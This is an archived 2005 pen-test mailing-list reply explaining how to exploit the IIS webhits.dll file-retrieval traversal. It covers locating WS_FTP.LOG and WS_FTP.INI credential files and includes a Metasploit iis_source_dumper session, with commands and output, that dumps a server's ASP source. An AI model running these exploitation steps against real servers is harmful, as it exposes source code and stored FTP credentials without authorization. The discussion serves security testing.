Re: Webhits.dll arbitrary file retrieval Vulnerability

From: H D Moore (sflist_at_digitaloffense.net)
Date: 03/04/05

  • Next message: Ulric Eriksson: "Re: HP BL30's and VLAN's"
    To: pen-test@securityfocus.com
    Date: Thu, 3 Mar 2005 17:42:05 -0600
    
    
    

    On Thursday 03 March 2005 01:25, Maverick The Techie wrote:
    > when i was doing a web server scan through Nikto on my website, it
    > reported that the files "/scripts/samples/search/qfullhit.htw" &
    > "/scripts/samples/search/qsumrhit.htw" are vulnerable to the
    > "Webhits.dll arbitrary file retrieval Vulnerability "

    There are two ways to exploit this; one uses an existenting htw file, the
    other uses a non-existent file (these may actually be different issues --
    its been forever since I have had to check).

    > Though, i could not retrieve the sam file hashes, i still got a HTTP
    > 200 Ok message,

    > now Nikto also says that there is a "Ws_ftp.log" file
    > on the server, now i dont have any clue on this file and its location
    > on the server, some admin say that it contains the FTP user id and
    > encrypted password which is way easy to crack!!,

    This is incorrect. A ws_ftp.LOG file will give you a list of all files
    uploaded to the server, the source address of the client, and the local
    directory on the client. A ws_ftp.INI file contains the stored usernames
    and obfuscated passwords. Check each subdirectory on the web server for
    WS_FTP.LOG and you can discover the complete layout of the web site,
    which may include non-public, debugging, or administrative features.

    > now is there a way that i can access that log file through the above
    > vulnerability, or any other files for that matter coz whatever files i
    > have tried to access using the above way i have got nothing but HTTP
    > OK messages.

    Yes, you can use the webhits issue to traverse the file system and read
    arbitrary files. The default location of WS_FTP.INI is usually in the
    Program Files directory. Since this is a traversal vulnerability, this
    depends on Program Files being on the same drive as the web root (or
    virtual directory where the HTW file exists).

    > I request u all to kindly explain the method to exploit this bug and
    > access files, coz i am unable to exploit this vulnerability in a
    > proper way so unless i know how this bug is exploited.

    Browse the relevant OSVDB and SecurityFocus database entries and examine
    the source code to the attached Metasploit exploit module.
    msf iis_source_dumper > set RHOST 172.16.2.10
    RHOST -> 172.16.2.10
    msf iis_source_dumper > set RFILE /default.asp
    RFILE -> /default.asp
    msf iis_source_dumper > show targets

    Supported Exploit Targets
    =========================

       0 All Techniques
       1 Truncated HTR
       2 NTFS ::$DATA
       3 Translate: F
       4 Null HTW
       5 Codebrws.asp
       6 Sample HTW
       7 Dot Plus HTR
       8 MSADC Showcode
       9 IIS 4 Showcode

    msf iis_source_dumper > set TARGET 0
    TARGET -> 0
    msf iis_source_dumper > exploit
    [*] Attempting to use the 'Truncated HTR' technique...
    [*] Attempting to use the 'NTFS ::$DATA' technique...
    [*] Attempting to use the 'Translate: F' technique...
    [*] Attempting to use the 'Null HTW' technique...
    [*] Source code obtained via technique Null HTW
    HTTP/1.0 200 OK
    Content-Type: text/html

    <HTML>
    <HEAD>
    <TITLE>Query Results</TITLE>
    </HEAD>
    <H2>"none" in </H2>
    <H2>/default.asp </H2><HR>
    <BODY><a NAME="CiTag-1"> </a><h3> <font color="#FF0000"> << </font> takes
    you to the previous hit. <font color="#FF0000"> >> </font> takes you to
    the next hit.</b></h3>

    -HD

    
    



  • Next message: Ulric Eriksson: "Re: HP BL30's and VLAN's"

    Relevant Pages

    • Re: Playing Videos
      ... The technique to use is to use a media server for the ... and not a web server. ... :: music "FROM THE SERVER" in another words the video / ...
      (microsoft.public.frontpage.client)
    • Re: write with cURL
      ... execute permissions. ... This is assuming that the PHP script runs ... of potential security risks from other users on the same server. ... web server itself is part of the group. ...
      (alt.php)
    • Re: web service architecture question
      ... To assume that we have all the security we will ever need is a bad one. ... ways to breach a server, and the separatin of the web and app server is one ... You can use remoting or web services. ... The web server will be exposed outside the ...
      (microsoft.public.dotnet.framework.webservices)
    • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
      ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
      (microsoft.public.dotnet.languages.vb)
    • RE: System.Data.SqlClient "Timeout expired" causing ASP.net web applic
      ... There are many values here that can shutdown the aspnet_wp. ... > update tables on a Web Server running SQL Server 2000. ... > formation(DataSet currentBalances): Timeout expired. ...
      (microsoft.public.dotnet.framework.aspnet)